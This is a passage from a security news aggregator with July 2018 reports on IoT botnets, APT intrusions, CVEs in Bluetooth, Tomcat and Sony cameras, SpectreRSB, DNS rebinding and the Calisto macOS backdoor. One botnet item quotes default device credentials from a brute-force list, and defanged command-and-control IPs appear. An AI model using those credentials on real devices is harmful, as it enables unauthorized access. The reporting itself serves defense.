“The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device.”

These are very powerful functions for debugging tools, and also useful for executing malicious code without being trapped by the usual security controls. As long as the adb tools is being used in a secured environment, it presents little risk. It is recommended that the adb service is disabled before releasing devices to consumers and it is common for the adb service to be restricted to USB connectivity only.

In early June security researcher Kevin Beaumont, warned that, “Unfortunately, vendors have been shipping products with Android Debug Bridge enabled. It listens on port 5555, and enables anybody to connect over the internet to a device. It is also clear some people are insecurely rooting their devices, too.” He goes on to describe the types of Android-based devices that were found to be in a vulnerable state and accessible from the Internet, “[…] we’ve found everything from tankers in the US to DVRs in Hong Kong to mobile telephones in South Korea. As an example, a specific Android TV device was also found to ship in this condition.” It only took one month from this warning until researchers at Trend Micro identified suspicious port scans on TCP port 5555.

According to the Trend Micro blog, “We found a new exploit using port 5555 after detecting two suspicious spikes in activity on July 9-10 and July 15. […] Our data shows that the first wave of network traffic came mainly from China and the US, while the second wave primarily involved Korea.”

ADBPort debugging tools

The Trend Micro researchers’ analysis shows a fairly typical command & control (C&C) malware infection process with many similarities to the Satori variant of the Mirai botnet. Once an open adb port is identified, the malware drops a stage 1 shell script onto the device which, when launched, downloads two additional (stage 2) shell scripts which then download the “next stage binary for several architectures and launch the corresponding one.” The binary establishes a connection to the C&C server, then scans processes running on the compromised device and attempts to kill any that are running the CoinHive script that could be mining Monero. At the same time, the binary attempts to spread to other devices as a worm.

It isn’t clear what the intent for the compromised devices is. Analysis of the code indicates that it could be used as a distributed denial of service (DDoS) platform if enough devices are compromised. Since it appears to be killing Monero mining processes, the compromised devices could be retasked to mine cryptocurrency for a different group. After Kevin Beaumont’s warning in June, IoT search engine Shodan added the ability to search for adb vulnerable systems and currently lists over 48,000 potentially vulnerable devices.

The Trend Micro researchers offer a few suggestions to reduce your risk:

On your mobile device, go to settings, select “Developer Options” and ensure that “ADB (USB) debugging and “Apps from Unknown Sources” are turned off
Apply recommended patches and updates from the vendor
Perform a factory reset to erase the malware if you feel you are infected
Update intrusion prevention systems (IPS) to identify potentially malicious code from reaching your device
The Android operating system was developed to run on a wide variety of devices. It is a flexible and complex solution that has encouraged a wide range of vendors to implement solutions based on Android. Some of these vendors have robust quality assurance processes in place and their solutions are “safe” while others allow mistakes to slip through the process and allow the vulnerabilities to land in the hands of end users. These users often aren’t aware of what operating system their devices are running and have no idea what vulnerabilities may exist until it is too late. It appears there are at least 48,000 examples of this waiting to be exploited.


DHS – Russian APT groups are inside US critical infrastructure
24.7.2018 securityaffairs APT

The US Government is warning of continuous intrusions in National critical infrastructure and it is blaming the Kremlin for the cyber attacks.
According to the US Department of Homeland Security, Russia’s APT groups have already penetrated America’s critical infrastructure, especially power utilities, and are still targeting them.
These attacks could have dramatic consequence, an attack against a power grid could cause a massive power outage.

It isn’t a sci-fi, it has already happened in Ukraine and security experts blamed Russian APT groups tracked as Dragonfly and Energetic Bear.

According to the government experts, hackers were able to penetrate also air-gapped networks.

The Wall Street Journal quoted Homeland Security officials reporting various attacks.

“Hackers working for Russia claimed “hundreds of victims” last year in a long-running campaign that put them inside the control rooms of U.S. electric utilities where they could have caused blackouts, federal officials said.” states the WSJ.

The officials sustain that the Energetic Bear APT has already penetrated “hundreds” of systems in national power grids.

The DHS issued several alerts related to the APT attacks and shared technical details about their TTPs, including Indicators of Compromise (IOCs) to detect their presence in the IT infrastructure.

Cyber intrusions of critical infrastructure are part of long-term information warfare strategy.

Russians APT Groups carried out spear-phishing attacks against utilities’ equipment vendors and sub subtractors to gather intelligence and collect information to penetrate the infrastructure.

Hackers aim at the exploitation of the accesses into the utilities used by equipment makers and suppliers for ordinary maintenance and telemetry. Their accesses could allow them to deploy malware into the facilities.

Unfortunately, the attacks are still ongoing, many critical infrastructure are operated by private companies with pour cyber hygiene.

Unfortunately, in many cases, the operators totally ignore the presence of the attackers into their networks.

“They got to the point where they could have thrown switches,” Jonathan Homer, chief of industrial control system analysis for Homeland Security, told the paper.


Bluetooth Vulnerability Allows Traffic Monitoring, Manipulation
24.7.2018 securityweek
Vulnerebility

A high severity vulnerability affecting some Bluetooth implementations can allow an attacker in physical proximity of two targeted devices to monitor and manipulate the traffic they exchange. Some of the impacted vendors have already released patches.

The flaw, discovered by researchers at the Israel Institute of Technology and tracked as CVE-2018-5383, is related to the Secure Simple Pairing and LE Secure Connections features.

According to the Bluetooth Special Interest Group (SIG), whose members maintain and improve the technology, Bluetooth specifications recommend that devices supporting the two features validate the public key received during the pairing process. However, this is not a requirement and some vendors’ Bluetooth products do not perform public key validation.Critical vulnerability found in Bluetooth

An unauthenticated attacker who is in Bluetooth range of the targeted devices during the pairing process can launch a man-in-the-middle (MitM) attack and obtain the encryption key, which allows them to intercept traffic and forge or inject device messages.

“The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful,” the Bluetooth SIG explained.

Additional technical details about the vulnerability and attack method were made public on Monday by CERT/CC.

The Bluetooth SIG says it has now updated specifications to require products to validate public keys. The organization has also added testing for this vulnerability to its Bluetooth Qualification Process, which all products that use Bluetooth must complete.

“There is no evidence that the vulnerability has been exploited maliciously and the Bluetooth SIG is not aware of any devices implementing the attack having been developed, including by the researchers who identified the vulnerability,” the Bluetooth SIG said.

Apple and Intel have already rolled out patches for this vulnerability. Apple fixed CVE-2018-5383 in the past weeks with the release of macOS High Sierra 10.13.5, iOS 11.4, watchOS 4.3.1, and tvOS 11.4.

Intel published an advisory on Monday, informing users that the high severity flaw impacts its Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC product families. The company has released both software and firmware updates to patch the security hole, and provided instructions on how to address the issue on Windows, Linux and Chrome OS systems.

Broadcom says some of its products using Bluetooth 2.1 or newer may be impacted, but it claims to have already made fixes available to its OEM customers. It’s now up to these companies to ensure that the patches reach end users.

CERT/CC’s advisory also lists Qualcomm as being affected, but the company has yet to provide any information.


EU Antitrust Officials Probe Thales, Gemalto Merger
24.7.2018 securityweek  BigBrothers

The European Union said Monday it has launched an anti-trust investigation into the planned purchase by French aerospace and defence group Thales of SIM manufacturer Gemalto.

The European Commission, the 28-nation EU's executive arm, said it wants to determine whether the merger will increase prices as well as reduce choice and innovation for customers of hardware security modules (HSM).

An HSM is hardware that "runs on encryption software to "generate, protect, and manage encryption keys used to protect data in a secure, tamper-resistant module," it said.

"Our society is increasingly dependent on data security solutions to secure all sorts of social, commercial or personal information," the EU's competition commissioner Margrethe Vestager said in a statement.

"We are opening this in-depth investigation to ensure that the proposed transaction between Thales and Gemalto would not lead to higher prices or less choice in hardware security modules for customers looking to safely encrypt their data," Vestager added.

In a deal valued at about 4.8 billion euros, Thales agreed in December to buy Gemalto, based in the Netherlands, outbidding French competitor Atos.

With the merger, Thales is aimming to become a global leader in digital security.

The commission expressed concern that the merger would reduce players in the market.

Gemalto is active in mobile platforms and services, mobile embedded software and products, smart cards, identification documents, government programs, machine to machine communication, and enterprise security.

The Commission said it has until 29 Noveber to take a decision.


Information Disclosure, DoS Flaws Patched in Apache Tomcat
24.7.2018 securityweek
  Vulnerebility

The Apache Software Foundation informed users over the weekend that updates for the Tomcat application server address several vulnerabilities, including issues that can lead to information disclosure and a denial-of-service (DoS) condition.

Apache Tomcat is an open source implementation of the Java Servlet, JavaServer Pages (JSP), Java WebSocket and Java Expression Language technologies. Tomcat is the most widely used web application server, with a market share of over 60 percent.

One of the more serious flaws, CVE-2018-8037, impacts Tomcat versions 9.0.0.M9 through 9.0.9 and 8.5.5 through 8.5.31. Patches are included in Tomcat 9.0.10 and 8.5.32.Apache Tomcat vulnerabilities

The vulnerability, rated “important,” has been described by the Apache Software Foundation as an information disclosure issue caused by a bug in the tracking of connection closures that can lead to user sessions getting mixed up.

Another security hole rated “important” is CVE-2018-1336, a bug in the UTF-8 decoder that can lead to a DoS condition. The flaw affects Tomcat versions 7.0.x, 8.0.x, 8.5.x and 9.0.x, and it has been resolved with the release of versions 9.0.7, 8.5.32, 8.0.52 and 7.0.90.

“An improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service,” the Apache Software Foundation said in its advisory.

The latest Tomcat 7.0.x, 8.0.x, 8.5.x and 9.0.x releases also patch a low severity security constraints bypass issue tracked as CVE-2018-8034.

“The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default,” reads the advisory for this vulnerability.

US-CERT has also released an alert, recommending that users review the Apache advisories and apply the updates.

Apache Tomcat vulnerabilities are less likely to be exploited in the wild. There was a worm targeting Apache Tomcat servers a few years ago, but it leveraged common username and password combinations rather than exploiting any vulnerabilities.

The Apache Software Foundation also informed customers last week of vulnerabilities impacting Apache Ignite, an open source memory-centric distributed database, caching, and processing platform. Ignite is currently ranked 66 by DB-Engines.

Ignite is impacted by two security holes, both of which could lead to arbitrary code execution .


Experts warn of new campaigns leveraging Mirai and Gafgyt variants
24.7.2018 securityaffairs BotNet

Security experts are warning of an intensification of attacks powered by two notorious IoT botnets, Mirai and Gafgyt.
Security experts are warning of a new wave of attacks powered by two botnets, Mirai and Gafgyt.

Since the code of the infamous Mirai botnet was leaked online many variants emerged in the threat landscape. Satori, Masuta, Wicked Mirai, JenX, Omni, and the OMG botnet are just the last variants appeared online in 2018.

The Gafgyt botnet, also known as Bashlite and Lizkebab, first appeared in the wild in 2014 had its source code was leaked in early 2015.

In September 2016, a joint research conducted by Level 3 Communications and Flashpoint allowed the identification of a million devices infected by the BASHLITE malware.

“The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.” reads the analysis published by PaloAlto Network.

“Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.”

The latest variants of both bots include the code to target the D-Link DSL-2750B OS Command Injection flaw, experts noticed that the new feature was implemented only a few weeks after the publication of the Metasploit module for its exploitation on May 25.

According to the experts, the two attacks appear to be linked.

The first campaign spotted by the experts is associated with the Omni bot that is one of the latest variants of the Mirai malware. The Omni bot includes a broad range of exploits such the code to trigger two vulnerabilities (CVE-2018-10561 and CVE-2018-1562) in Dasan GPON routers, a flaw in Huawei router tracked as CVE-2017–17215, two command execution issues in D-Link devices, vulnerabilities in Vacron NVR devices, a remote code execution in CCTVs and DVRs from over 70 vendors, a JAWS Webserver command execution.

“All of these vulnerabilities are publicly known and have been exploited by different botnets either separately or in combination with others in the past, however, this is the first Mirai variant using all eleven of them together.” continues the report published by PaloAlto.

The campaign leverages two different encryption schemes, the bot propagates only via exploits and prevents further infection of compromised devices through dropping packets received on certain ports using iptables.

The last variant of Mirai uses the IP 213[.]183.53.120 for both for serving payloads and as a Command and Control (C2) server, the same address was also used by some Gafgyt samples.

A second campaign observed by the researchers was using the same exploits of the previous one but also attempted to carry on credential brute force attacks.

The campaign was tracked as Okane by the name of the binaries downloaded by the shell script to replicate itself.

“Unlike the previous campaign, these samples also perform a credential brute force attack.” continues the analysis.

“Some unusual entries were discovered on the brute force lists in these samples, such as the following:

root/t0talc0ntr0l4! – default credentials for Control4 devices
admin/adc123 – default credentials for ADC FlexWave Prism devices
mg3500/merlin – default credentials for Camtron IP cameras
Some samples belonging to this campaign include the addition of two new DDoS methods to the Mirai source code.”

mirai okane

Experts at PaloAlto Networks observed a third campaign, tracked as Hakai, that was attempting to infect devices with the Gafgyt malware by using all the previous exploits code, except for the UPnP SOAP TelnetD Command Execution exploit.

Further details about the campaigns, including IoCs are included in the post published by PaloAlto.


SpectreRSB – new Spectre CPU side-channel attack using the Return Stack Buffer
24.7.2018 securityaffairs Attack

Researchers from the University of California, Riverside (UCR) have devised a new Spectre CPU side-channel attack called SpectreRSB.
SpectreRSB leverage the speculative execution technique that is implemented by most modern CPUs to optimize performance.

Differently, from other Spectre attacks, SpectreRSB recovers data from the speculative execution process by targeting the Return Stack Buffer (RSB).

“rather than exploiting the branch predictor unit, SpectreRSB exploits the return stack buffer (RSB), a common predictor structure in modern CPUs used to predict return
addresses.” reads the research paper.

“We show that both local attacks (within the same process such as Spectre 1) and attacks on SGX are possible by constructing proof of concept attacks”

The experts demonstrated that they could pollute the RSB code to control the return address and poison a CPU’s speculative execution routine.

The experts explained that the RSB is shared among hardware threads that execute
on the same virtual processor enabling inter-process, or even inter-vm, pollution of the RSB

The academics proposed three attack scenarios that leverage the SpectreRSB attack to pollute the RSB and gain access to data they weren’t authorized to view.

In two attacks, the experts polluted the RSB to access data from other applications running on the same CPU. In the thirds attack they polluted the RSB to cause a misspeculation that exposes data outside an SGX compartment.

“an attack against an SGX compartment where a malicious OS pollutes the RSB
to cause a misspeculation that exposes data outside an SGX compartment. This attack bypasses all software and microcode patches on our SGX machine” continues the paper.

Researchers said they reported the issue to Intel, but also to AMD and ARM. Researchers only tested the attack on Intel CPUs, but it is likely that both AMD and ARM processors are affected because they both use RSBs to predict return addresses.

According to the researchers, current Spectre patches are not able to mitigate the SpectreRSB attacks.

“Importantly, none of the known defenses including Retpoline and Intel’s microcode patches stop all SpectreRSB attacks,” wrote the experts.

“We believe that future system developers should be aware of this vulnerability and consider it in developing defenses against speculation attacks. “

The good news is that Intel has already a patch that stops this attack on some CPUs, but wasn’t rolled out to all of its processors.

“In particular, on Core-i7 Skylake and newer processors (but not on Intel’s Xeon processor line), a patch called RSB refilling is used to address a vulnerability when the RSB underfills” continues the researchers.

“This defense interferes with SpectreRSB’s ability to launch attacks that switch into the kernel. We recommend that this patch should be used on all machines to protect against SpectreRSB.”

A spokesperson for Intel told El Reg the Xeon maker believes its mitigations do thwart SpectreRSB side-channel shenanigans:

“SpectreRSB is related to Branch Target Injection (CVE-2017-5715), and we expect that the exploits described in this paper are mitigated in the same manner. We have already published guidance for developers in the whitepaper, Speculative Execution Side Channel Mitigations. We are thankful for the ongoing work of the research community as we collectively work to help protect customers.”


Sony addresses remotely exploitable flaws in Sony IPELA E Network Cameras
23.7.2018 securityaffairs
Exploit

Sony fixed 2 remotely exploitable flaws in Sony IPELA E Series Network Camera products that could be exploited to execute commands or arbitrary code.
Sony addressed two remotely exploitable flaws in Sony IPELA E Series Network Camera products that could be exploited to execute commands or arbitrary code on affected devices.

The first vulnerability, tracked as CVE-2018-3937, is a command injection issue that affects the measurementBitrateExec features implemented in the IPELA E Series Network Camera.

The vulnerability was reported by the researchers Cory Duplantis and Claudio Bozzato from Cisco Talos. An attacker could execute arbitrary code by sending specially crafted HTTP GET request to vulnerable devices.

“An exploitable command injection vulnerability exists in the measurementBitrateExec functionality of Sony IPELA E Series Network Camera. A specially crafted GET request can cause arbitrary commands to be executed. An attacker can send an HTTP request to trigger this vulnerability. Detailed vulnerability information can be found here.” wrote the researchers.

The experts explained that the devices fail to check on the server address while parsing the input measurement string. The attacker can provide any string as the server address and it will be executed via system.

“While parsing the input measurement string, there isn’t a check on the server address (-c). In this manner, any string can be placed as the server address and will be executed via system. Knowing this, an attacker can execute arbitrary commands in the position of the server address,” continues the experts.

Sony IPELA E

The second issue, tracked as CVE-2018-3938, is a stack buffer overflow that resides in the 802dot1xclientcert.cgi functionality of the Sony IPELA E Series Camera products.

“An exploitable stack buffer overflow vulnerability exists in the “802dot1xclientcert.cgi” functionality of Sony IPELA E Series Camera. A specially crafted POST request can cause a stack buffer overflow, resulting in remote code execution. An attacker can send a malicious POST request to trigger this vulnerability. Detailed vulnerability information can be found here.” wrote the researchers.

The vulnerability could be exploited by sending specially crafted POST request.

“A specially crafted POST can cause a stack-based buffer overflow, resulting in remote code execution. An attacker can send a malicious POST request to trigger this vulnerability,” continues the experts.

The 802dot1xclientcert.cgi component is “designed to handle everything related to certificate management for 802.1x.”

The system fails to check the strlen length of the incoming data that is directly copied to a local buffer via memcpy. This means that the attacker can provide content to trigger the stack-based buffer overflow that could allow the attacker to remotely execute commands on the affected device.

Both vulnerabilities effects Sony IPELA E series G5 firmware 1.87.00, the tech giant released an update last week to address them.


Botnet Targets Open Ports on Android Devices
23.7.2018 securityweek BotNet

A wave of attacks is targeting Android devices with port 5555 open, likely in an attempt to ensnare them into a botnet, Trend Micro warns.

TCP port 5555 is designed to allow management of devices via Android Debug Bridge (ADB), an Android SDK feature that allows developers to easily communicate with devices and to run commands on them or fully control them.

The ADB port is meant to be disabled on commercial devices and to require initial USB connectivity to be enabled. Last month, however, security researcher Kevin Beaumont revealed that many devices ship with ADB enabled, which leaves them exposed to attacks.

Scanning attacks specifically targeting the ADB port have been seen since January. In early 2018, a worm leveraging a modified version of Mirai’s code was searching for devices with open port 5555 to spread for crypto-mining purposes.

Now, Trend Micro says a new exploit is targeting port 5555. The security firm has observed a spike in activity on July 9-10, when network traffic came mainly from China and the US, followed by a second wave on July 15, primarily involving Korea.

“From our analysis of the network packets, we determined that the malware spreads via scanned open ADB ports. It drops the stage 1 shell script via ADB connection to launch on the targeted system. This script downloads the two stage 2 shell scripts responsible for launching the stage 3 binary,” Trend Micro explains.

After infecting devices, the malware targets a series of processes for termination and launches its own child processes, one of which is responsible for spreading the malware as a worm. It also opens a connection to the command and control (C&C) server.

The payload also contains a header with a number of targets and IP packet types to be sent, which could suggest the malware was designed to launch distributed denial of service (DDoS) attacks (it can send UDP, TCP SYN, and TCP ACK packets (with a random payload of random length), UDP with random payload tunneled through Generic Routing Encapsulation (GRE), and TCP SYN).

Trend Micro also discovered that the downloaded binaries connect to the C&C server at 95[.]215[.]62[.]169, which was found to be linked to the Mirai variant Satori.

“It’s reasonable to believe that the same author was behind this sample and Satori,” Trend's security researchers say.

The malware’s worm-like spreading capabilities could suggest other attacks might follow the recently observed spikes in activity, Trend Micro also notes. The security firm suggests the actor behind the malware might have been “testing the effectiveness of their tools and tactics to prepare for a more serious attack.”

An online search reveals over 48,000 IoT systems vulnerable to ADB exploitations, but not all of them might be exposed, as some are likely behind routers with Network Address Translation (NAT). Even so, misconfigurations might result in these devices becoming accessible from the Internet, turning them into easy targets for the malware.

“All multimedia devices, smart TVs, mobile phones, and other devices without additional protection are easy targets for this malware regardless of the user’s password strength,” Trend Micro concludes.


Microsoft Addresses Serious Vulnerability in Translator Hub
23.7.2018 securityweek
Vulnerebility

A serious vulnerability in the Microsoft Translator Hub could be exploited to delete any or all of the 13000+ projects hosted by the service, a security researcher has discovered.

The service allows interested parties to build their own machine translation system tailored for their organizational needs and then use it, via the Microsoft Translator Text API, in applications, websites, with Microsoft Document Translator, and more.

According to Microsoft, the Translator Hub allows enterprises build translation systems, and allows governments, universities and language preservation communities to “build translation systems between any pair of languages, including languages not yet supported by Microsoft Translator, and reduce communication barriers.”

While hunting for vulnerabilities on the Hub, security researcher Haider Mahmood discovered that the HTTP request for removing a project contained the “projectid” parameter, which is the ID of the individual project in the database.

Furthermore, Mahmood also discovered that the request also had no Cross-Site Request Forgery (CSRF) protection. This means that an attacker could exploit the CSRF vulnerability to impersonate a legitimate, logged in user and perform actions on their behalf.

An attack scenario, he says, would require for an attacker to know the ProjectID number of a logged in victim. Thus, they could include a URL in a page to issue a remove command and, as soon as the victim visits that page, the request would be sent from their browser and the project removed.

Further analysis of the issue revealed an Indirect Object Reference vulnerability, which could essentially allow an attacker to set any ProjectID in the HTTP project removal request and delete any of the projects in Microsoft Translator Hub.

In fact, by iterating through project IDs starting from 0 to 13000, an attacker could delete all projects from the database, the security researcher reveals.

Mahmood reported the vulnerability to Microsoft in late February 2018. The company addressed the issue within the next two weeks, and also offered the researcher an acknowledgement on their Online Researcher Acknowledgement page.


State-Actors Likely Behind Singapore Cyberattack: Experts
23.7.2018 securityweek Cyber

State-actors were likely behind Singapore's biggest ever cyberattack to date, security experts say, citing the scale and sophistication of the hack which hit medical data of about a quarter of the population.

The city-state announced Friday that hackers had broken into a government database and stolen the health records of 1.5 million Singaporeans, including Prime Minister Lee Hsien Loong who was specifically targeted in the "unprecedented" attack.

Singapore's health minister said the strike was "a deliberate, targeted, and well-planned cyberattack and not the work of casual hackers or criminal gangs".

While officials refused to comment on the identity of the hackers citing "operational security", experts told AFP that the complexity of the attack and its focus on high-profile targets like the prime minister pointed to the hand of a state-actor.

"A cyber espionage threat actor could leverage disclosure of sensitive health information... to coerce an individual in (a) position of interest to conduct espionage" on its behalf, said Eric Hoh, Asia-Pacific president of cybersecurity firm FireEye.

Hoh told national broadcaster Channel NewsAsia that the attack was an "advanced persistent threat".

"The nature of such attacks are that they are conducted by nation states using very advanced tools," he said.

"They tend to be well resourced, well-funded and highly sophisticated."

Russia -- which is accused of meddling in the US presidential election -- China, Iran and North Korea are believed to have the capability to carry out such attacks.

Analysts, however, would not be drawn into speculation on who might be behind the hack or why Singapore was targeted.

The attack started two weeks after the wealthy city-state hosted the historic summit between US President Donald Trump and North Korean leader Kim Jong Un.

Jeff Middleton, chief executive of cybersecurity consultancy Lantium, said healthcare data is of particular interest to hackers because it can be used to blackmail people in positions of power.

"A lot of information about a person's health can be gleaned from the medications that they take," Middleton told AFP Saturday.

"Any non-public health information could be used for extortion. Russian spy services have a long history of doing this."

Medical information, like personal data, can also be easily monetised on criminal forums, said Sanjay Aurora, Asia-Pacific managing director of Darktrace.

"Beyond making a quick buck, a more sinister reason to attack would be to cause widespread disruption and systemic damage to the healthcare service -- as a fundamental part of critical infrastructure –- or to undermine trust in a nation's competency to keep personal data safe," he told AFP.

- Hyper-connected -

Today, cybercriminals are targeting more than just individuals or banks, said Shahnawaz Backer, regional security specialist at F5 Networks.

"Government services, from healthcare to education, are targets that are just as likely, as evidenced by the recent attacks in Singapore," Backer said.

"As Singapore embraces the digital revolution, security breaches are bound to happen. Our growing digital footprint is growing every day, and enterprises need to take strict measures to safeguard and protect their data."

Wealthy Singapore is hyper-connected and on a drive to digitise government records and essential services, including medical records which public hospitals and clinics can share via a centralised database.

But authorities have put the brakes on these plans while they investigate the breach. A former judge will head an inquiry looking into the hack.

Singapore officials have cautioned against jumping to conclusions about the attackers.

"With regard to the prime minister's data and why he was targeted, I would say that it's perhaps best not to speculate what the attacker had in mind," said David Koh, head of Singapore's Cyber Security Agency.

The hackers used a computer infected with malware to gain access to the database between June 27 and July 4 before administrators spotted "unusual activity", authorities said.

The government says it fends off thousands of cyberattacks every day and has long warned of breaches by actors as varied as high-school students in their bedrooms to nation-states.

Earlier this month, US intelligence chief Dan Coats described Russia, China, Iran and North Korea as the "worst offenders" when it came to attacks on American "digital infrastructure".


Half a Billion Enterprise Devices Exposed by DNS Rebinding
23.7.2018 securityweek Hacking

Nearly half a billion devices used by enterprises are exposed to cyberattacks by DNS rebinding, according to a study conducted by IoT security firm Armis.

DNS rebinding, an attack method that has been known for more than a decade, allows a remote hacker to bypass the targeted entity’s network firewall and abuse their web browser to directly communicate with devices on the local network and exploit any vulnerabilities they may have. Getting the target to access a malicious page or view a malicious advertisement is often enough to conduct an attack that can lead to theft of sensitive information and taking control of vulnerable devices.

Google Project Zero researcher Tavis Ormandy revealed a few months ago that DNS rebinding could be used to exploit critical flaws in BitTorrent’s uTorrent application and the Transmission BitTorrent client.

More recently, researcher Brannon Dorsey showed how malicious actors could exploit vulnerabilities in Google Home and Chromecast devices, Roku TVs, Sonos Wi-Fi speakers, routers, and smart thermostats via DNS rebinding.

Armis, the firm that discovered the Bluetooth flaws dubbed BlueBorne, conducted its own research on the impact of DNS rebinding on enterprises.

The company estimates that there are 496 million enterprise devices worldwide that are exposed due to DNS rebinding. This includes 165 million printers, 160 million IP cameras, 124 million IP phones, 28 million smart TVs, 14 million switches and routers, and 5 million media players.

Number of devices vulnerable to DNS rebinding attacks

“Because of the widespread use of the types of devices listed above within enterprises, Armis can say that nearly all enterprises are susceptible to DNS rebinding attacks,” Armis said.

As an example of vulnerabilities that can be exploited as a result of DNS rebinding, the company highlighted the flaws patched this month by Cisco in its IP phones. Armis also pointed to the critical security holes discovered recently in Axis and Foscam cameras.

As for printers, researchers noted, “Unfortunately, printers are one of the least managed, most poorly configured devices in the enterprise. Aside from adjusting basic network configurations, enterprises typically deploy printers with default settings, making them an ideal target for a DNS rebinding attack.”

In an attack scenario described by Armis, the attacker simply needs to trick the targeted user into visiting a specially crafted website which hosts JavaScript code that will be executed in the victim’s browser. The JavaScript code instructs the browser to scan local IP addresses in search of vulnerable devices.

Once vulnerable systems are identified, the attacker can use DNS rebinding to send arbitrary commands (e.g. log into the web server) directly to the IP address of the compromised IoT device. The attacker can also establish an outbound connection to the C&C server and chances are that none of these communications will be detected or blocked by security products.

Since DNS rebinding is possible due to how DNS and web browsers work, Armis believes the best way for enterprises to protect their networks against attacks is to monitor all devices for signs of a breach, perform a risk analysis of IoT devices to determine which systems are vulnerable, and ensure that the devices are secure, including by applying software patches and disabling unnecessary services.


Calisto macOS Backdoor Remained Undetected for Two Years
23.7.2018 securityweek Apple

A recently discovered backdoor targeting macOS systems remained undetected for at least two years, according to security firm Kaspersky Lab.

Dubbed Calisto, the malware was first uploaded to VirusTotal in 2016, likely the same year it was created, but it remained undetected by anti-virus solutions until May 2018, Kaspersky's security researchers say.

The backdoor is being distributed as an unsigned DMG image that masquerades as Intego’s Internet Security X9 for Apple's macOS. A comparison with the legitimate application shows that the threat looks fairly convincing, being likely to trick users, especially those who haven’t encountered the application before.

When launched, the malware displays a fake license agreement that differs only slightly compared to Intego’s legitimate agreement.

Next, Calisto asks for the user login and password but, as soon as the user provides the credentials, it hangs and displays an error message, informing the victim they should download a new installation package from Intego’s official site.

On machines with SIP (System Integrity Protection) enabled, an error occurs when the malware attempts to modify system files and it crashes. Apple introduced SIP in 2015 to protect critical system files from being modified, and it appears that the malware developers didn’t take that into account.

The Trojan uses a hidden directory named .calisto to store keychain storage data, data extracted from the user login/password window, network connection information, and Google Chrome data (history, bookmarks, and cookies).

If SIP is disabled, the malware copies itself to the /System/Library/ folder, sets itself to launch automatically on startup, unmounts and uninstalls its DMG image, adds itself to Accessibility, enables remote access to the system, and harvests additional information about the system and sends all data to the command and control (C&C) server.

The Trojan also includes some unfinished and unused functionality, such as the loading/unloading of kernel extensions for handling USB devices, data theft from user directories, and self-destruction (together with the OS).

Some of Calisto characteristics, Kaspersky says, would bring the malware close to the Backdoor.OSX.Proton family. The threat poses as a well-known antivirus (Proton was disguising as a Symantec product), its code contains the line “com.proton.calisto.plist,” and can steal a lot of personal data from the system, including the contents of Keychain.

The Proton remote access Trojan was discovered in 2017. It was being advertised as “a professional FUD surveillance and control solution” that could provide complete remote control of infected machines and could steal anything from credit card information to keystrokes and screenshots.

“The Calisto Trojan we detected was created no later than 2016. Assuming that this Trojan was written by the same authors, it could well be one of the very first versions of Backdoor.OSX.Proton or even a prototype. The latter hypothesis is supported by the large number of unused and not fully implemented functions. However, they were missing from later versions of Proton,” Kaspersky concludes.


SSRF Flaw Exposed Information From Google's Internal Network
23.7.2018 securityweek
Vulnerebility

A researcher has earned a significant bug bounty from Google after finding a serious server-side request forgery (SSRF) vulnerability that exposed information from the tech giant’s internal network.

The flaw was discovered by security engineer Enguerran Gillier in May and it took Google less than 48 hours to implement a patch. The expert earned $13,337 for his findings, which is the highest reward offered by the company for unrestricted file access issues.

Gillier identified the security hole after previously reporting a cross-site scripting (XSS) vulnerability in Google Caja, a tool that makes it safe to embed third party HTML, JavaScript and CSS code in a website.

He checked if the XSS attack he had discovered worked on Google Sites as well, which at the time used an unpatched version of Caja. After he failed to reproduce the XSS vulnerability, the expert tested for SSRF and discovered that the Google Sites Caja server was only fetching resources from Google domains.

The researcher bypassed this limitation by hosting a JavaScript file on Google Cloud services. The SSRF test resulted in a 1 Mb reply from the server, containing various pieces of private information from Google’s internal network.

Gillier reported his findings to Google, but continued conducting tests until the company rolled out a fix. While he did not manage to achieve unrestricted file access or remote code execution, the researcher did come across some interesting information from Google’s Borg, a datacenter management system that runs the company’s services.

A Borg cell includes a set of machines, a central controller named the Borgmaster, and an agent process called Borglet that runs on each machine.

Gillier made three test requests while Google was working on patching the issue and each of them led to the server responding with the status monitoring page of a Borglet. This provided the researcher various types of information, including what type of hardware powered the servers, performance data, and information on the tasks (jobs) submitted by users to Borg.

The researcher has made public some of the information he discovered. While none of the disclosed details appear to be particularly sensitive, some have questioned if he was allowed to make the information public and if he made the right choice in doing so.

“It’s not easy to determine the impact of an SSRF because it really depends on what’s in the internal network,” Gillier explained in a blog post. “Google tends to keep most of its infrastructure available internally and uses a lot of web endpoints, which means that in case of a SSRF, an attacker could potentially access hundreds if not thousands of internal web applications. On the other hand, Google heavily relies on authentication to access resources which limits the impact of a SSRF.”

“[Google] explained that while most internal resources would require authentication, they have seen in the past dev or debug handlers giving access to more than just info leaks, so they decided to reward for the maximum potential impact,” he added.


Mirai, Gafgyt IoT Botnet Attacks Intensify
23.7.2018 securityweek BotNet

Security researchers are warning of a new wave of attacks associated with two infamous Internet of Things (IoT) botnets: Mirai and Gafgyt.

Behind some of the largest distributed denial of service (DDoS) attacks in history, Mirai had its source code leaked in October 2016, soon after it first emerged. Numerous Mirai variants have spawned from its source code since, the most recent of which include Wicked and Omni.

Also known as Bashlite, Lizkebab, and Torlus, Gafgyt was first spotted in 2014 and had its source code leaked in early 2015. By the summer of 2016, the number of ensnared devices peaked at over 1 million, though they were spread over multiple botnets.

Three recent infection campaigns associated with these two botnets have revealed an increased interest from malware authors towards exploiting vulnerabilities in IoT devices, rather than weak credentials.

The attacks also appear to suggest once again that there could be a connection between the two botnets, something that initial reports on Mirai two years ago were detailing as well.

The first campaign is associated with Omni, one of the latest evolutions of Mirai, and stands out in the crowd because of its exclusive use of exploits, Palo Alto Networks reveals.

